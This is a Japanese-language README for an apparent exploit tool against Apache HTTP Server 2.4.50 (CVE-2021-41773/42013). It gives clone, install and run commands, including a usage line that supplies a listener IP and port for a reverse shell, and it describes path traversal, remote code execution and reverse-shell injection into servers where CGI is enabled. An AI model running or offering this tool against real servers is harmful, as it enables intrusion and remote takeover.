
Apache-HTTP-Server-2.4.50-RCE このツールは、CVE-2021-41773 / CVE-2021-42013 の脆弱性についてApacheサーバーをテストするために設計されています。教育目的のみを意図しており、テストする明示的な許可があるシステム上で責任を持って使用する必要があります。
このツールは、CVE-2021-41773 / CVE-2021-42013 の脆弱性について Apache サーバーをテストするために設計されています。教育目的のみを意図しており、明示的な許可を得たシステム上で責任を持って使用する必要があります。
git clone https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE.git
cd Apache-HTTP-Server-2.4.50-RCE
pip3 install requests~=2.27.1 termcolor~=1.1.0
pip3 install -r add_requirements.txt
python3 50512.py target.txt -ip <YourIp> -port <ThePort>
テキストファイルにはターゲットの URL を含める必要があります
python3 50512.py target.txt -ip 10.0.2.15 -port 4444



Apache バージョンチェック: 提供されたファイル内の各 URL について、サーバーが Apache バージョン 2.4.50 を実行しているかどうかを確認します。
サーバーが脆弱な場合: ペイロードを送信して、ディレクトリトラバーサル攻撃をトリガーするか、リモートでコードを実行しようとします。 CGI が有効な場合: リバースシェルペイロードを注入してリモートアクセスを取得しようとします。
教育目的のみ: このスクリプトは、脆弱性をテストおよび悪用する方法を示すための教育目的で意図されています。許可されていないターゲットに対してこのスクリプトを使用することは違法であり、非倫理的です。
改変の目的: 追加のエラーハンドリングの追加、ペイロードロジックと RCE の最適化、および CVE の削除